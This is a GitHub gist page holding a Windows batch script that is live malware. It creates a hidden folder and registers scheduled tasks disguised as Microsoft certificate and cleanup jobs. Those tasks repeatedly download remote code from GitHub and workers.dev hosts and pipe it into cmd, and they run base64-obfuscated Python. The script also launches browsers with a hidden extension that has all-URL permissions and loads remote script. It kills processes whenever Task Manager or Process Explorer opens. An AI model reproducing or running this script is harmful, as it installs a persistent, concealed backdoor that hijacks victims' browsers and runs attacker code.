-
-
Save ZerGo0/ce1d2786cdb5ecca248f309a98b1d987 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell if( (Get-WinSystemLocale).name -notmatch 'en-' ){ TASKKILL /F /IM cmd.exe /T } | |
mkdir C:\systemfile | |
cd C:\systemfile | |
attrib +s +h "C:\systemfile" /d | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp.xml | |
echo ^<Triggers^> >> C:\systemfile\temp.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp.xml | |
echo ^<Repetition^> >> C:\systemfile\temp.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp.xml | |
echo ^</Repetition^> >> C:\systemfile\temp.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml | |
echo ^<Delay^>PT68S^</Delay^> >> C:\systemfile\temp.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp.xml | |
echo ^</Triggers^> >> C:\systemfile\temp.xml | |
echo ^<Principals^> >> C:\systemfile\temp.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp.xml | |
echo ^</Principal^> >> C:\systemfile\temp.xml | |
echo ^</Principals^> >> C:\systemfile\temp.xml | |
echo ^<Settings^> >> C:\systemfile\temp.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp.xml | |
echo ^</Settings^> >> C:\systemfile\temp.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp.xml | |
echo ^<Exec^> >> C:\systemfile\temp.xml | |
echo ^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml | |
echo ^<Arguments^>/c more c.z ^| cmd ^& more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^> >> C:\systemfile\temp.xml | |
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp.xml | |
echo ^</Exec^> >> C:\systemfile\temp.xml | |
echo ^</Actions^> >> C:\systemfile\temp.xml | |
echo ^</Task^> >> C:\systemfile\temp.xml | |
schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F | |
Del "C:\systemfile\temp.xml" | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp2.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp2.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp2.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp2.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp2.xml | |
echo ^<Description^>Regular browser Maintenance.^</Description^> >> C:\systemfile\temp2.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp2.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp2.xml | |
echo ^<Triggers^> >> C:\systemfile\temp2.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp2.xml | |
echo ^<Repetition^> >> C:\systemfile\temp2.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp2.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp2.xml | |
echo ^</Repetition^> >> C:\systemfile\temp2.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml | |
echo ^<Delay^>PT60S^</Delay^> >> C:\systemfile\temp2.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp2.xml | |
echo ^</Triggers^> >> C:\systemfile\temp2.xml | |
echo ^<Principals^> >> C:\systemfile\temp2.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp2.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp2.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp2.xml | |
echo ^</Principal^> >> C:\systemfile\temp2.xml | |
echo ^</Principals^> >> C:\systemfile\temp2.xml | |
echo ^<Settings^> >> C:\systemfile\temp2.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp2.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp2.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp2.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp2.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp2.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp2.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp2.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp2.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp2.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp2.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp2.xml | |
echo ^</Settings^> >> C:\systemfile\temp2.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp2.xml | |
echo ^<Exec^> >> C:\systemfile\temp2.xml | |
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" ^| findstr chrome`) DO set CHROMEPATH=%A %B | |
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\brave.exe" ^| findstr brave`) DO set BRAVEPATH=%A %B | |
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe" ^| findstr msedge`) DO set MSEDGEPATH=%A %B | |
echo "%CHROMEPATH%" | findstr /C:"chrome" >nul && ( echo "%CHROMEPATH%" & echo ^<Command^>"%CHROMEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || ( | |
echo "%BRAVEPATH%" | findstr /C:"brave" >nul && ( echo "%BRAVEPATH%" & echo ^<Command^>"%BRAVEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || ( | |
echo "%MSEDGEPATH%" | findstr /C:"msedge" >nul && ( echo "%MSEDGEPATH%" & echo ^<Command^>"%MSEDGEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || (del "C:\systemfile\temp2.xml" & Exit) )) | |
echo ^<Arguments^> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1^</Arguments^> >> C:\systemfile\temp2.xml | |
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp2.xml | |
echo ^</Exec^> >> C:\systemfile\temp2.xml | |
echo ^</Actions^> >> C:\systemfile\temp2.xml | |
echo ^</Task^> >> C:\systemfile\temp2.xml | |
schtasks /create /xml "C:\systemfile\temp2.xml" /tn "\Microsoft\Windows\Application Experience\Maintenance" /F | |
Del "C:\systemfile\temp2.xml" | |
attrib -s -h "C:\systemfile\c.z" | |
del C:\systemfile\c.z | |
echo cd C:\systemfile > C:\systemfile\c.z | |
echo mkdir C:\Windows\security >> C:\systemfile\c.z | |
echo Tasklist /FI "SESSION eq 0" ^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^>nul ^&^& ( start /b PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) >> C:\systemfile\c.z | |
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/pywinveraa -o "C:\Windows\security\pywinveraa") >> C:\systemfile\c.z | |
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/winver -o "C:\Windows\security\winver") >> C:\systemfile\c.z | |
echo ren "C:\Windows\security\winver" winver.png >> C:\systemfile\c.z | |
echo mkdir "C:\Windows\security\pywinvera" >> C:\systemfile\c.z | |
echo IF NOT EXIST "C:\Windows\security\pywinvera\libs" ("C:\Windows\security\winver.png" x "C:\Windows\security\pywinveraa" -o"C:\Windows\security" ) >> C:\systemfile\c.z | |
echo del "C:\Windows\security\pywinveraa" >> C:\systemfile\c.z | |
echo del "C:\Windows\security\winver.png" >> C:\systemfile\c.z | |
echo. >> C:\systemfile\c.z | |
echo attrib -s -h "C:\systemfile\c.z" >> C:\systemfile\c.z | |
echo ^echo Tasklist /FI "SESSION eq 0" ^^^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^^^>nul ^^^&^^^& ( PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) ^^^|^^^| (^^^Exit)^> ^C:\systemfile\c.z >> C:\systemfile\c.z | |
echo attrib +s +h "C:\systemfile\*" /s /d >> C:\systemfile\c.z | |
attrib +s +h "C:\systemfile\c.z" | |
echo { > C:\systemfile\manifest.json | |
echo "name": "Chrome-edge-ext", >> C:\systemfile\manifest.json | |
echo "version": "0.1", >> C:\systemfile\manifest.json | |
echo "description": "Chrome-edge-ext..", >> C:\systemfile\manifest.json | |
echo "permissions": [ >> C:\systemfile\manifest.json | |
echo "<all_urls>", >> C:\systemfile\manifest.json | |
echo "activeTab", >> C:\systemfile\manifest.json | |
echo "tabs", >> C:\systemfile\manifest.json | |
echo "downloads" >> C:\systemfile\manifest.json | |
echo ], >> C:\systemfile\manifest.json | |
echo "background": { >> C:\systemfile\manifest.json | |
echo "page": "background.html", >> C:\systemfile\manifest.json | |
echo "persistent": true >> C:\systemfile\manifest.json | |
echo }, >> C:\systemfile\manifest.json | |
echo "manifest_version": 2, >> C:\systemfile\manifest.json | |
echo "content_security_policy": "script-src 'self' https://*.alexrybak0555.workers.dev/; object-src 'self'" >> C:\systemfile\manifest.json | |
echo } >> C:\systemfile\manifest.json | |
echo ^<script src="https://cdn2.alexrybak0555.workers.dev/"^>^</script^> > C:\systemfile\background.html | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp3.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp3.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp3.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp3.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp3.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp3.xml | |
echo ^<Principals^> >> C:\systemfile\temp3.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp3.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp3.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp3.xml | |
echo ^</Principal^> >> C:\systemfile\temp3.xml | |
echo ^</Principals^> >> C:\systemfile\temp3.xml | |
echo ^<Settings^> >> C:\systemfile\temp3.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp3.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp3.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp3.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp3.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp3.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp3.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp3.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp3.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp3.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp3.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp3.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp3.xml | |
echo ^</Settings^> >> C:\systemfile\temp3.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp3.xml | |
echo ^<Exec^> >> C:\systemfile\temp3.xml | |
echo ^<Command^>python^</Command^> >> C:\systemfile\temp3.xml | |
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp3.xml | |
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp3.xml | |
echo ^</Exec^> >> C:\systemfile\temp3.xml | |
echo ^</Actions^> >> C:\systemfile\temp3.xml | |
echo ^</Task^> >> C:\systemfile\temp3.xml | |
schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F | |
Del "C:\systemfile\temp3.xml" | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp4.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp4.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp4.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp4.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp4.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp4.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp4.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp4.xml | |
echo ^<Principals^> >> C:\systemfile\temp4.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp4.xml | |
echo ^<LogonType^>InteractiveToken^</LogonType^> >> C:\systemfile\temp4.xml | |
echo ^<RunLevel^>HighestAvailable^</RunLevel^> >> C:\systemfile\temp4.xml | |
echo ^</Principal^> >> C:\systemfile\temp4.xml | |
echo ^</Principals^> >> C:\systemfile\temp4.xml | |
echo ^<Settings^> >> C:\systemfile\temp4.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp4.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp4.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp4.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp4.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp4.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp4.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp4.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp4.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp4.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp4.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp4.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp4.xml | |
echo ^</Settings^> >> C:\systemfile\temp4.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp4.xml | |
echo ^<Exec^> >> C:\systemfile\temp4.xml | |
echo ^<Command^>pythonw^</Command^> >> C:\systemfile\temp4.xml | |
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IGF1dG9pdCwgb3MKYXV0b2l0LmF1dG9faXRfc2V0X29wdGlvbigiV2luV2FpdERlbGF5IiwgMCkKYXV0b2l0Lndpbl93YWl0KCdbUkVHRVhQVElUTEU6KD9pKSguKlByb2Nlc3MgRXhwbG9yZXIuKnwuKlRhc2sgTWFuYWdlci4qfC4qU3lzdGVtIEV4cGxvcmVyLip8LipQcm9jZXNzIEhhY2tlci4qfC4qQW5WaXIgVGFzay4qfC4qV2luVXRpbGl0aWVzLiopXScpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp4.xml | |
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp4.xml | |
echo ^</Exec^> >> C:\systemfile\temp4.xml | |
echo ^</Actions^> >> C:\systemfile\temp4.xml | |
echo ^</Task^> >> C:\systemfile\temp4.xml | |
schtasks /create /xml "C:\systemfile\temp4.xml" /tn "\Microsoft\Windows\Services\CertPathw" /F | |
Del "C:\systemfile\temp4.xml" | |
cd C:\ | |
where curl || powershell "(New-Object System.Net.WebClient).DownloadFile('https://github.com/alexrybak0444/New/raw/main/curl', 'C:\Windows\system32\curl.exe')" | |
cd C:\systemfile | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp5.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp5.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp5.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp5.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp5.xml | |
echo ^<Description^>left over Component Cleanup^</Description^> >> C:\systemfile\temp5.xml | |
echo ^<URI^>\Microsoft\Windows\Servicing\ComponentCleanup^</URI^> >> C:\systemfile\temp5.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp5.xml | |
echo ^<Triggers^> >> C:\systemfile\temp5.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp5.xml | |
echo ^<Repetition^> >> C:\systemfile\temp5.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp5.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp5.xml | |
echo ^</Repetition^> >> C:\systemfile\temp5.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp5.xml | |
echo ^</Triggers^> >> C:\systemfile\temp5.xml | |
echo ^<Principals^> >> C:\systemfile\temp5.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp5.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp5.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp5.xml | |
echo ^</Principal^> >> C:\systemfile\temp5.xml | |
echo ^</Principals^> >> C:\systemfile\temp5.xml | |
echo ^<Settings^> >> C:\systemfile\temp5.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp5.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp5.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp5.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp5.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp5.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp5.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp5.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp5.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp5.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp5.xml | |
echo ^</Settings^> >> C:\systemfile\temp5.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp5.xml | |
echo ^<Exec^> >> C:\systemfile\temp5.xml | |
echo ^<Command^>curl^</Command^> >> C:\systemfile\temp5.xml | |
echo ^<Arguments^>https://autobat.alexrybak0444.workers.dev/ -o ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp5.xml | |
echo ^</Exec^> >> C:\systemfile\temp5.xml | |
echo ^</Actions^> >> C:\systemfile\temp5.xml | |
echo ^</Task^> >> C:\systemfile\temp5.xml | |
schtasks /create /xml "C:\systemfile\temp5.xml" /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /F | |
Del "C:\systemfile\temp5.xml" | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp6.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp6.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp6.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp6.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp6.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp6.xml | |
echo ^<URI^>\Microsoft\Windows\Servicing\ServiceCleanup^</URI^> >> C:\systemfile\temp6.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp6.xml | |
echo ^<Triggers^> >> C:\systemfile\temp6.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp6.xml | |
echo ^<Repetition^> >> C:\systemfile\temp6.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp6.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp6.xml | |
echo ^</Repetition^> >> C:\systemfile\temp6.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml | |
echo ^<Delay^>PT8S^</Delay^> >> C:\systemfile\temp6.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp6.xml | |
echo ^</Triggers^> >> C:\systemfile\temp6.xml | |
echo ^<Principals^> >> C:\systemfile\temp6.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp6.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp6.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp6.xml | |
echo ^</Principal^> >> C:\systemfile\temp6.xml | |
echo ^</Principals^> >> C:\systemfile\temp6.xml | |
echo ^<Settings^> >> C:\systemfile\temp6.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp6.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp6.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp6.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp6.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp6.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp6.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp6.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp6.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp6.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp6.xml | |
echo ^</Settings^> >> C:\systemfile\temp6.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp6.xml | |
echo ^<Exec^> >> C:\systemfile\temp6.xml | |
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp6.xml | |
echo ^<Arguments^>/c type ^%temp^%\c4329f-4b8b33e-fa4fffe0 ^| cmd ^&^& del ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp6.xml | |
echo ^</Exec^> >> C:\systemfile\temp6.xml | |
echo ^</Actions^> >> C:\systemfile\temp6.xml | |
echo ^</Task^> >> C:\systemfile\temp6.xml | |
schtasks /create /xml "C:\systemfile\temp6.xml" /tn "\Microsoft\Windows\Servicing\ServiceCleanup" /F | |
Del "C:\systemfile\temp6.xml" | |
